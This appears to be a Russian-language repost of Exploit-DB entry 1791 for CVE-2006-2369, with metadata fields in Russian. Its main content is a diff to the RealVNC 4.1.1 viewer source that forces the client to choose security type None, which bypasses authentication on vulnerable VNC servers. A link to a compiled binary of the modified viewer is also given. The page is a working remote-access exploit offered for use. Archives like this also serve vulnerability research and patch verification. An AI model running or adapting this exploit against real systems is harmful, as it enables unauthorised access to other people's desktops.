- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1791
- Проверка EDB
-
- Пройдено
- Автор
- REDSAND
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2006-2369
- Дата публикации
- 2006-05-16
Код:
xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
--- vnc-4_1_1-unixsrc/common/rfb/CConnection.cxx 2005-03-11 09:08:41.000000000 -0600
+++ vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx 2006-05-15 14:03:30.000000000 -0500
@@ -183,7 +183,12 @@
// Inform the server of our decision
if (secType != secTypeInvalid) {
- os->writeU8(secType);
+
+ // [BL4CK] In response to the VNC Null Authentication
+ // force a secType to equal secTypeNone
+ // http://blacksecurity.org
+ secType = secTypeNone;
+ os->writeU8(secTypeNone);
os->flush();
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
E-DB Note:
Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)- Источник
- www.exploit-db.com
